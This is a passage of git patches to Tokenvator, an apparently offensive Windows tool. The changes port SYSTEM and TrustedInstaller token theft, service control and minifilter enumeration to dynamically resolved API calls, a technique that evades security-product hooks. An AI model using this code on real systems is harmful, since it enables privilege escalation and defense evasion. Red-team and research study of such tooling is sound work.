+                retVal = fControlService(hSCObject, Winsvc.dwControl.SERVICE_CONTROL_STOP, ref serviceStatus);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] ControlService Generated an Exception");
+                Console.WriteLine(ex.Message);
+                return false;
+            }
 
-            if (IntPtr.Zero == hControlService)
+            if (!retVal)
             {
                 int error = Marshal.GetLastWin32Error();
                 if (1062 != error)
                 {
                     Console.WriteLine("[-] Failed to stop service");
-                    Console.WriteLine(new System.ComponentModel.Win32Exception(error).Message);
+                    Misc.GetWin32Error("ControlService");
                     return false;
                 }
             }
+
             Console.WriteLine("[+] Stopped Service");
             return true;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Deletes the service
+        /// <summary>
+        /// Deletes the service
+        /// Converted to GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         internal bool Delete()
         {
-            if (!advapi32.DeleteService(hSCObject))
+            ///////////////////////////////////////////////////////////////////////////////
+            // advapi32.DeleteService(hSCObject)
+            ///////////////////////////////////////////////////////////////////////////////
+            IntPtr hDeleteService = Generic.GetExportAddress(hadvapi32, "DeleteService");
+            MonkeyWorks.advapi32.DeleteService fDeleteService = (MonkeyWorks.advapi32.DeleteService)Marshal.GetDelegateForFunctionPointer(hDeleteService, typeof(MonkeyWorks.advapi32.DeleteService));
+
+            bool retVal = false;
+            try
+            {
+                retVal = fDeleteService(hSCObject);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] DeleteService Generated an Exception");
+                Console.WriteLine(ex.Message);
+                return false;
+            }
+
+
+            if (!retVal)
             {
-                Console.WriteLine("[-] Failed to delete service");
-                Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
+                Misc.GetWin32Error("DeleteService");
                 return false;
             }
             Console.WriteLine("[+] Deleted service");
             return true;
         }
-
-        ////////////////////////////////////////////////////////////////////////////////
-        //
-        ////////////////////////////////////////////////////////////////////////////////
-        internal static string GenerateUuid(int length)
-        {
-            Random random = new Random();
-            const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
-            return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray());
-        }
     }
 }
\ No newline at end of file
diff --git a/Tokenvator/Plugins/NamedPipes/NamedPipes.cs b/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
index 2f7e5be..601ba6a 100644
--- a/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
+++ b/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
@@ -66,7 +66,7 @@ internal static void GetSystem(string command, string arguments)
         ////////////////////////////////////////////////////////////////////////////////
         private static bool _GetSystem()
         {
-            string pipename = PSExec.GenerateUuid(12);
+            string pipename = Misc.GenerateUuid(12);
 
             Thread thread = new Thread(() => _GetPipeToken(pipename));
 
diff --git a/Tokenvator/Resources/Misc.cs b/Tokenvator/Resources/Misc.cs
index 7233307..c4a30c9 100644
--- a/Tokenvator/Resources/Misc.cs
+++ b/Tokenvator/Resources/Misc.cs
@@ -55,6 +55,16 @@ public static bool FindFullPath(string input, out string fullpath)
             }
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        //
+        ////////////////////////////////////////////////////////////////////////////////
+        internal static string GenerateUuid(int length)
+        {
+            Random random = new Random();
+            const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
+            return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray());
+        }
+
         ////////////////////////////////////////////////////////////////////////////////
         ////////////////////////////////////////////////////////////////////////////////
         public static void GetLsaNtError(string location, uint ntError)
diff --git a/Tokenvator/Tokenvator.csproj b/Tokenvator/Tokenvator.csproj
index f49937f..abc4933 100644
--- a/Tokenvator/Tokenvator.csproj
+++ b/Tokenvator/Tokenvator.csproj
@@ -130,7 +130,7 @@
     <Reference Include="System.ServiceProcess" />
     <Reference Include="System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
       <SpecificVersion>False</SpecificVersion>
-      <HintPath>..\..\..\..\..\..\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll</HintPath>
+      <HintPath>..\..\..\..\..\..\..\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll</HintPath>
     </Reference>
   </ItemGroup>
   <ItemGroup>

From 1440c60032d84451c2141b43701d98378555c25d Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Mon, 13 Sep 2021 13:40:01 -0500
Subject: [PATCH 20/36] Removed services.cs , replaced with psexec. Converting
 Filters & FilterInstances

---
 Tokenvator/MainLoop.Modules.cs                |  36 ++-
 .../Plugins/AccessTokens/TokenManipulation.cs |  47 +++-
 Tokenvator/Plugins/Execution/PSExec.cs        |  18 +-
 Tokenvator/Plugins/Execution/Services.cs      |  31 +--
 .../Plugins/MiniFilters/FilterInstance.cs     | 193 +++++++++++++---
 Tokenvator/Plugins/MiniFilters/Filters.cs     | 211 ++++++++++++++++--
 Tokenvator/Resources/Misc.cs                  |  35 ++-
 Tokenvator/Tokenvator.csproj                  |   1 -
 8 files changed, 476 insertions(+), 96 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index 717fb70..0161ea7 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -549,10 +549,22 @@ private static void _IsCriticalProcess(CommandLineParsing cLP, IntPtr hProcess)
         ////////////////////////////////////////////////////////////////////////////////
         private static void _ListFilters()
         {
-            using (Filters filters = new Filters())
+            using (Filters f = new Filters())
             {
-                filters.First();
-                filters.Next();
+                if (!f.Load())
+                {
+                    return;
+                }
+
+                if (!f.First())
+                {
+                    return;
+                }
+
+                if (!f.Next())
+                {
+                    return;
+                }
             }
         }
 
@@ -568,10 +580,22 @@ private static void _ListFiltersInstances(CommandLineParsing cLP)
                 return;
             }
 
-            using (FilterInstance filterInstance = new FilterInstance(filter))
+            using (FilterInstance fi = new FilterInstance(filter))
             {
-                filterInstance.First();
-                filterInstance.Next();
+                if (!fi.Load())
+                {
+                    return;
+                }
+
+                if (!fi.First())
+                {
+                    return;
+                }
+
+                if (!fi.Next())
+                {
+                    return;
+                }
             }
         }
 
diff --git a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
index 4794bd9..c1b6856 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
@@ -1,5 +1,5 @@
 using System;
-using System.Collections.Generic;
+using System.Diagnostics;
 using System.Runtime.ExceptionServices;
 using System.Runtime.InteropServices;
 using System.Security;
@@ -12,7 +12,6 @@
 using Tokenvator.Plugins.Execution;
 
 using MonkeyWorks.Unmanaged.Headers;
-using System.Diagnostics;
 //using MonkeyWorks.Unmanaged.Libraries;
 
 namespace Tokenvator.Plugins.AccessTokens
@@ -21,6 +20,8 @@ namespace Tokenvator.Plugins.AccessTokens
 
     partial class TokenManipulation : AccessTokens
     {
+        private const string TRUSTED_INSTALLER = "TrustedInstaller";
+
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Default Constructor
@@ -159,19 +160,39 @@ public bool GetSystem()
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetTrustedInstaller(string newProcess)
         {
+            const string TRUSTED_INSTALLER = "TrustedInstaller";
+
             Console.WriteLine("[+] Getting NT AUTHORITY\\SYSTEM privileges");
             //This is required for duplicate token
             GetSystem();
             Console.WriteLine(" [*] Running as: {0}", WindowsIdentity.GetCurrent().Name);
 
+            /*
             Services services = new Services("TrustedInstaller");
             if (!services.StartService())
             {
                 Misc.GetWin32Error("StartService");
                 return false;
             }
+            */
+
+            using (PSExec psexec = new PSExec(TRUSTED_INSTALLER))
+            {
+                if (!psexec.Connect("."))
+                {
+                    return false;
+                }
+                if (!psexec.Open())
+                {
+                    return false;
+                }
+                if (!psexec.Start())
+                {
+                    return false;
+                }
+            }
 
-            if (!OpenProcessToken((int)services.GetServiceProcessId()))
+            if (!OpenProcessToken((int)Misc.GetProcessId(TRUSTED_INSTALLER)))
             {
                 Misc.GetWin32Error("OpenProcessToken");
                 return false;
@@ -208,14 +229,32 @@ public bool GetTrustedInstaller()
             GetSystem();
             Console.WriteLine(" [+] Running as: {0}", WindowsIdentity.GetCurrent().Name);
 
+            /*
             Services services = new Services("TrustedInstaller");
             if (!services.StartService())
             {
                 Misc.GetWin32Error("StartService");
                 return false;
             }
+            */
+
+            using (PSExec psexec = new PSExec(TRUSTED_INSTALLER))
+            {
+                if (!psexec.Connect("."))
+                {
+                    return false;
+                }
+                if (!psexec.Open())
+                {
+                    return false;
+                }
+                if (!psexec.Start())
+                {
+                    return false;
+                }
+            }
 
-            if (!OpenProcessToken((int)services.GetServiceProcessId()))
+            if (!OpenProcessToken((int)Misc.GetProcessId(TRUSTED_INSTALLER)))
             {
                 return false;
             }
diff --git a/Tokenvator/Plugins/Execution/PSExec.cs b/Tokenvator/Plugins/Execution/PSExec.cs
index a43eaa6..5688ceb 100644
--- a/Tokenvator/Plugins/Execution/PSExec.cs
+++ b/Tokenvator/Plugins/Execution/PSExec.cs
@@ -21,10 +21,14 @@ sealed class PSExec : IDisposable
 
         private bool disposed;
 
-        private IntPtr hadvapi32;
+        private readonly IntPtr hadvapi32;
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Constructor - Service name provided
+        ///  No Conversions Required 
+        /// </summary>
+        /// <param name="serviceName"></param>
         ////////////////////////////////////////////////////////////////////////////////
         public PSExec(string serviceName)
         {
@@ -34,7 +38,10 @@ public PSExec(string serviceName)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Constructor - Service name not specified
+        /// No Conversions Required 
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         public PSExec()
         {
@@ -44,7 +51,10 @@ public PSExec()
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Default Deconstructor
+        /// No Conversions Required 
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         ~PSExec()
         {
diff --git a/Tokenvator/Plugins/Execution/Services.cs b/Tokenvator/Plugins/Execution/Services.cs
index 593d8ea..143c969 100644
--- a/Tokenvator/Plugins/Execution/Services.cs
+++ b/Tokenvator/Plugins/Execution/Services.cs
@@ -5,11 +5,10 @@
 
 namespace Tokenvator.Plugins.Execution
 {
-    class Services
+    sealed class Services
     {
         private ServiceController service;
         private string serviceName;
-        private uint ProcessId;
 
         ////////////////////////////////////////////////////////////////////////////////
         ////////////////////////////////////////////////////////////////////////////////
@@ -99,33 +98,5 @@ public bool StopService()
                 return false;
             }
         }
-
-        ////////////////////////////////////////////////////////////////////////////////
-        ////////////////////////////////////////////////////////////////////////////////
-        public uint GetServiceProcessId()
-        {
-            List<ManagementObject> systemProcesses = new List<ManagementObject>();
-            ManagementScope scope = new ManagementScope("\\\\.\\root\\cimv2");
-            scope.Connect();
-            if (!scope.IsConnected)
-            {
-                Console.WriteLine("[-] Failed to connect to WMI");
-            }
-
-            Console.WriteLine(" [*] Querying for service: " + serviceName);
-            ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_Service WHERE Name = \'" + serviceName + "\'");
-            ManagementObjectSearcher objectSearcher = new ManagementObjectSearcher(scope, query);
-            ManagementObjectCollection objectCollection = objectSearcher.Get();
-            if (objectCollection == null)
-            {
-                Console.WriteLine("ManagementObjectCollection");
-            }
-            foreach (ManagementObject managementObject in objectCollection)
-            {
-                ProcessId = (uint)managementObject["ProcessId"];
-            }
-            Console.WriteLine(" [+] Returned PID: " + ProcessId);
-            return ProcessId;
-        }
     }
 }
diff --git a/Tokenvator/Plugins/MiniFilters/FilterInstance.cs b/Tokenvator/Plugins/MiniFilters/FilterInstance.cs
index 1d2f7ad..41cfa05 100644
--- a/Tokenvator/Plugins/MiniFilters/FilterInstance.cs
+++ b/Tokenvator/Plugins/MiniFilters/FilterInstance.cs
@@ -1,82 +1,189 @@
 using System;
+using System.Runtime.ExceptionServices;
 using System.Runtime.InteropServices;
+using System.Security;
+
+using DInvoke.DynamicInvoke;
 
 using MonkeyWorks.Unmanaged.Headers;
-using MonkeyWorks.Unmanaged.Libraries;
 
+using Tokenvator.Resources;
 
 namespace Tokenvator.Plugins.MiniFilters
 {
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
     class FilterInstance : Filters
     {
+        private bool disposed = false;
+
         private readonly string filterName;
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// 
+        /// </summary>
+        /// <param name="filterName"></param>
         ////////////////////////////////////////////////////////////////////////////////
         internal FilterInstance(string filterName) : base()
         {
             this.filterName = filterName;
+
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// 
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        internal override void First()
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        internal override bool First()
         {
-            Console.WriteLine("{0,-20} {1,-11} {2,8} {3,-20}", "Instance Name", "Filter Name", "Altitude", "Volume Name");
-            Console.WriteLine("{0,-20} {1,-11} {2,8} {3,-20}", "-------------", "-----------", "--------", "-----------");
+            ////////////////////////////////////////////////////////////////////////////////
+            // First call to function to get buffer size
+            // fltlib.FilterInstanceFindFirst(filterName, FltUserStructures._INSTANCE_INFORMATION_CLASS.InstanceFullInformation, IntPtr.Zero, 0, ref dwBytesReturned, ref hFilters);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hFilterInstanceFindFirst = Generic.GetExportAddress(hfltlib, "FilterInstanceFindFirst");
+            MonkeyWorks.fltlib.FilterInstanceFindFirst fFilterInstanceFindFirst = (MonkeyWorks.fltlib.FilterInstanceFindFirst)Marshal.GetDelegateForFunctionPointer(hFilterInstanceFindFirst, typeof(MonkeyWorks.fltlib.FilterInstanceFindFirst));
 
             uint dwBytesReturned = 0;
-            uint result = fltlib.FilterInstanceFindFirst(filterName, FltUserStructures._INSTANCE_INFORMATION_CLASS.InstanceFullInformation, IntPtr.Zero, 0, ref dwBytesReturned, ref hFilters);
-
-            if (2149515283 == result)
+            uint retVal = 0;
+            try
+            {
+                retVal = fFilterInstanceFindFirst(filterName, FltUserStructures._INSTANCE_INFORMATION_CLASS.InstanceFullInformation, IntPtr.Zero, 0, ref dwBytesReturned, ref hFilters);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] FilterInstanceFindFirst Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+           
+            if (ERROR_FLT_FILTER_NOT_FOUND == retVal)
             {
                 Console.WriteLine("Filter Not Found");
-                Dispose();
-                return;
+                return false;
             }
 
-            if (2147942522 != result || 0 == dwBytesReturned)
+            //Buffer too small is expected result
+            if (ERROR_INSUFFICIENT_BUFFER != retVal || 0 == dwBytesReturned)
             {
-                return;
+                return false;
             }
 
+            ////////////////////////////////////////////////////////////////////////////////
+            // fltlib.FilterInstanceFindFirst(filterName, FltUserStructures._INSTANCE_INFORMATION_CLASS.InstanceFullInformation, IntPtr.Zero, 0, ref dwBytesReturned, ref hFilters);
+            ////////////////////////////////////////////////////////////////////////////////
             IntPtr lpBuffer = Marshal.AllocHGlobal((int)dwBytesReturned);
-            fltlib.FilterInstanceFindFirst(filterName, FltUserStructures._INSTANCE_INFORMATION_CLASS.InstanceFullInformation, lpBuffer, dwBytesReturned, ref dwBytesReturned, ref hFilters);
+
+            try
+            {
+                retVal = fFilterInstanceFindFirst(filterName, FltUserStructures._INSTANCE_INFORMATION_CLASS.InstanceFullInformation, lpBuffer, dwBytesReturned, ref dwBytesReturned, ref hFilters);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] FilterInstanceFindFirst Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+
+            if (0 != retVal)
+            {
+                Misc.GetWin32Error("FilterInstanceFindFirst");
+                return false;
+            }
+
+            Console.WriteLine("{0,-20} {1,-11} {2,8} {3,-20}", "Instance Name", "Filter Name", "Altitude", "Volume Name");
+            Console.WriteLine("{0,-20} {1,-11} {2,8} {3,-20}", "-------------", "-----------", "--------", "-----------");
 
             Print(lpBuffer);
             Marshal.FreeHGlobal(lpBuffer);
+
+            return true;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// 
+        /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        internal override void Next()
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        internal override bool Next()
         {
             if (IntPtr.Zero == hFilters)
             {
-                return;
+                return false;
             }
 
+            ////////////////////////////////////////////////////////////////////////////////
+            // First call to function to get buffer size
+            // fltlib.FilterInstanceFindNext(hFilters, FltUserStructures._INSTANCE_INFORMATION_CLASS.InstanceFullInformation, IntPtr.Zero, 0, ref lpBytesReturned)
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hFilterInstanceFindNext = Generic.GetExportAddress(hfltlib, "FilterInstanceFindNext");
+            MonkeyWorks.fltlib.FilterInstanceFindNext fFilterInstanceFindNext = (MonkeyWorks.fltlib.FilterInstanceFindNext)Marshal.GetDelegateForFunctionPointer(hFilterInstanceFindNext, typeof(MonkeyWorks.fltlib.FilterInstanceFindNext));
+
             uint lpBytesReturned = 0;
-            uint result = 0;
+            uint retVal = 0;
             do
             {
-                if (2147942522 != fltlib.FilterInstanceFindNext(hFilters, FltUserStructures._INSTANCE_INFORMATION_CLASS.InstanceFullInformation, IntPtr.Zero, 0, ref lpBytesReturned))
+                try
+                {
+                    retVal = fFilterInstanceFindNext(hFilters, FltUserStructures._INSTANCE_INFORMATION_CLASS.InstanceFullInformation, IntPtr.Zero, 0, ref lpBytesReturned);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] FilterInstanceFindNext Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                    return false;
+                }
+
+                if (ERROR_FLT_FILTER_NOT_FOUND == retVal)
+                {
+                    Console.WriteLine("Filter Not Found");
+                    return false;
+                }
+
+                //Buffer too small is expected result
+                if (ERROR_INSUFFICIENT_BUFFER != retVal || 0 == lpBytesReturned)
                 {
                     break;
                 }
+
+                ////////////////////////////////////////////////////////////////////////////////
+                // result = fltlib.FilterInstanceFindNext(hFilters, FltUserStructures._INSTANCE_INFORMATION_CLASS.InstanceFullInformation, lpBuffer, lpBytesReturned, ref lpBytesReturned);
+                ////////////////////////////////////////////////////////////////////////////////
                 IntPtr lpBuffer = Marshal.AllocHGlobal((int)lpBytesReturned);
-                result = fltlib.FilterInstanceFindNext(hFilters, FltUserStructures._INSTANCE_INFORMATION_CLASS.InstanceFullInformation, lpBuffer, lpBytesReturned, ref lpBytesReturned);
-                Print(lpBuffer);
-                Marshal.FreeHGlobal(lpBuffer);
+
+                try
+                {
+                    retVal = fFilterInstanceFindNext(hFilters, FltUserStructures._INSTANCE_INFORMATION_CLASS.InstanceFullInformation, lpBuffer, lpBytesReturned, ref lpBytesReturned);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] FilterInstanceFindNext Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                    return false;
+                }
+
+                if (0 == retVal)
+                {
+                    Print(lpBuffer);
+                    Marshal.FreeHGlobal(lpBuffer);
+                }
             }
-            while (0 == result);
+            while (0 == retVal);
+
+            return true;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// 
+        /// </summary>
+        /// <param name="baseAddress"></param>
         ////////////////////////////////////////////////////////////////////////////////
         private void Print(IntPtr baseAddress)
         {
@@ -108,19 +215,49 @@ private void Print(IntPtr baseAddress)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// 
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         ~FilterInstance()
         {
-            Dispose();
+            if (!disposed)
+            {
+                Dispose();
+            }
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// 
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public override void Dispose()
         {
-            fltlib.FilterInstanceFindClose(hFilters);
+            ////////////////////////////////////////////////////////////////////////////////
+            // Closes the filter instance handle
+            // fltlib.FilterInstanceFindClose(hFilters);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hFilterInstanceFindClose = Generic.GetExportAddress(hfltlib, "FilterInstanceFindClose");
+            MonkeyWorks.fltlib.FilterInstanceFindClose fFilterInstanceFindClose = (MonkeyWorks.fltlib.FilterInstanceFindClose)Marshal.GetDelegateForFunctionPointer(hFilterInstanceFindClose, typeof(MonkeyWorks.fltlib.FilterInstanceFindClose));
+
+            uint retVal = 0;
+            try
+            {
+                retVal = fFilterInstanceFindClose(hFilters);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] FilterInstanceFindClose Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return;
+            }
+            finally
+            {
+                disposed = true;
+            }
         }
     }
 }
diff --git a/Tokenvator/Plugins/MiniFilters/Filters.cs b/Tokenvator/Plugins/MiniFilters/Filters.cs
index a6d851c..34802d2 100644
--- a/Tokenvator/Plugins/MiniFilters/Filters.cs
+++ b/Tokenvator/Plugins/MiniFilters/Filters.cs
@@ -1,65 +1,196 @@
 using System;
+using System.Runtime.ExceptionServices;
 using System.Runtime.InteropServices;
+using System.Security;
+using DInvoke.DynamicInvoke;
 
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
-
 using Tokenvator.Resources;
 
 namespace Tokenvator.Plugins.MiniFilters
 {
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
     class Filters : IDisposable
     {
+        private bool disposed = false;
+
+        protected uint ERROR_FLT_FILTER_NOT_FOUND = 2149515283;
+        protected uint ERROR_INSUFFICIENT_BUFFER = 2147942522;
+
+        protected IntPtr hfltlib;
+
         protected IntPtr hFilters = IntPtr.Zero;
         //private FltUserStructures._FILTER_AGGREGATE_BASIC_INFORMATION info;
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// 
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
         public Filters()
         {
             Console.WriteLine();
         }
 
-        internal virtual void First()
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// 
+        /// </summary>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
+        internal bool Load()
         {
-            Console.WriteLine("{0,8} {1,9} {2,8} {3,-10}", "Frame ID", "Instances", "Altitude", "Filter Name");
-            Console.WriteLine("{0,8} {1,9} {2,8} {3,-10}", "--------", "---------", "--------", "-----------");
+            hfltlib = Generic.GetPebLdrModuleEntry("fltlib.dll");
+            if (IntPtr.Zero == hfltlib)
+            {
+                hfltlib = Generic.LoadModuleFromDisk("fltlib.dll");
+                if (IntPtr.Zero == hfltlib)
+                {
+                    Console.WriteLine("Unable to load fltlib.dll");
+
+                    disposed = true;
+
+                    return false;
+                }
+            }
+            return true;
+        }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// 
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        internal virtual bool First()
+        {
+            ////////////////////////////////////////////////////////////////////////////////
+            // First call to function to get buffer size
+            // fltlib.FilterFindFirst(FltUserStructures._FILTER_INFORMATION_CLASS.FilterAggregateBasicInformation, IntPtr.Zero, 0, ref dwBytesReturned, ref hFilters);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hFilterFindFirst = Generic.GetExportAddress(hfltlib, "FilterFindFirst");
+            MonkeyWorks.fltlib.FilterFindFirst fFilterFindFirst = (MonkeyWorks.fltlib.FilterFindFirst)Marshal.GetDelegateForFunctionPointer(hFilterFindFirst, typeof(MonkeyWorks.fltlib.FilterFindFirst));
 
             uint dwBytesReturned = 0;
-            uint result = fltlib.FilterFindFirst(FltUserStructures._FILTER_INFORMATION_CLASS.FilterAggregateBasicInformation, IntPtr.Zero, 0, ref dwBytesReturned, ref hFilters);
+            uint retVal = 0;
+            try
+            {
+                retVal = fFilterFindFirst(FltUserStructures._FILTER_INFORMATION_CLASS.FilterAggregateBasicInformation, IntPtr.Zero, 0, ref dwBytesReturned, ref hFilters);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] FilterFindFirst Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
 
-            if (2147942522 != result || 0 == dwBytesReturned)
+            //Buffer too small is expected result
+            if (ERROR_INSUFFICIENT_BUFFER != retVal || 0 == dwBytesReturned)
             {
-                return;
+                return false;
             }
-            IntPtr lpBuffer = Marshal.AllocHGlobal((int)dwBytesReturned);            
-            fltlib.FilterFindFirst(FltUserStructures._FILTER_INFORMATION_CLASS.FilterAggregateBasicInformation, lpBuffer, dwBytesReturned, ref dwBytesReturned, ref hFilters);
-            
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // fltlib.FilterFindFirst(FltUserStructures._FILTER_INFORMATION_CLASS.FilterAggregateBasicInformation, lpBuffer, dwBytesReturned, ref dwBytesReturned, ref hFilters);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr lpBuffer = Marshal.AllocHGlobal((int)dwBytesReturned);
+
+            try
+            {
+                retVal = fFilterFindFirst(FltUserStructures._FILTER_INFORMATION_CLASS.FilterAggregateBasicInformation, lpBuffer, dwBytesReturned, ref dwBytesReturned, ref hFilters);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] FilterFindFirst Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+
+            if (0 != retVal)
+            {
+                Misc.GetWin32Error("FilterFindFirst");
+                return false;
+            }
+
+            Console.WriteLine("{0,8} {1,9} {2,8} {3,-10}", "Frame ID", "Instances", "Altitude", "Filter Name");
+            Console.WriteLine("{0,8} {1,9} {2,8} {3,-10}", "--------", "---------", "--------", "-----------");
+
             Print(lpBuffer);
             Marshal.FreeHGlobal(lpBuffer);
+
+            return true;
         }
 
-        internal virtual void Next()
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// 
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        internal virtual bool Next()
         {
             if (IntPtr.Zero == hFilters)
             {
-                return;
+                return false;
             }
 
-            uint result = 0;
+            ////////////////////////////////////////////////////////////////////////////////
+            // First call to function to get buffer size
+            // fltlib.FilterFindNext(hFilters, FltUserStructures._FILTER_INFORMATION_CLASS.FilterAggregateBasicInformation, IntPtr.Zero, 0, out lpBytesReturned)
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hFilterFindNext = Generic.GetExportAddress(hfltlib, "FilterFindNext");
+            MonkeyWorks.fltlib.FilterFindNext fFilterFindNext = (MonkeyWorks.fltlib.FilterFindNext)Marshal.GetDelegateForFunctionPointer(hFilterFindNext, typeof(MonkeyWorks.fltlib.FilterFindNext));
+
+            uint lpBytesReturned = 0;
+            uint retVal = 0;
             do
             {
-                uint lpBytesReturned = 0;
-                if (2147942522 != fltlib.FilterFindNext(hFilters, FltUserStructures._FILTER_INFORMATION_CLASS.FilterAggregateBasicInformation, IntPtr.Zero, 0, out lpBytesReturned))
+                try
+                {
+                    retVal = fFilterFindNext(hFilters, FltUserStructures._FILTER_INFORMATION_CLASS.FilterAggregateBasicInformation, IntPtr.Zero, 0, ref lpBytesReturned);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] FilterFindNext Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                    return false;
+                }
+
+                if (ERROR_INSUFFICIENT_BUFFER != retVal)
                 {
                     break;
                 }
+
+                ////////////////////////////////////////////////////////////////////////////////
+                // fltlib.FilterFindNext(hFilters, FltUserStructures._FILTER_INFORMATION_CLASS.FilterAggregateBasicInformation, lpBuffer, lpBytesReturned, out lpBytesReturned)
+                ////////////////////////////////////////////////////////////////////////////////
                 IntPtr lpBuffer = Marshal.AllocHGlobal((int)lpBytesReturned);
-                result = fltlib.FilterFindNext(hFilters, FltUserStructures._FILTER_INFORMATION_CLASS.FilterAggregateBasicInformation, lpBuffer, lpBytesReturned, out lpBytesReturned);
-                                
-                Print(lpBuffer);
-                Marshal.FreeHGlobal(lpBuffer);
+                
+                try
+                {
+                    retVal = fFilterFindNext(hFilters, FltUserStructures._FILTER_INFORMATION_CLASS.FilterAggregateBasicInformation, lpBuffer, lpBytesReturned, ref lpBytesReturned);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] FilterFindNext Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                    return false;
+                }
+
+                if (0 == retVal)
+                {
+                    Print(lpBuffer);
+                    Marshal.FreeHGlobal(lpBuffer);
+                }
             }
-            while (0 == result);
+            while (0 == retVal);
+
+            return true;
         }
 
         private static void Print(IntPtr baseAddress)
@@ -175,14 +306,50 @@ internal static void Unload(CommandLineParsing cLP)
             Console.WriteLine("[+] Filter Unloaded");
         }
 
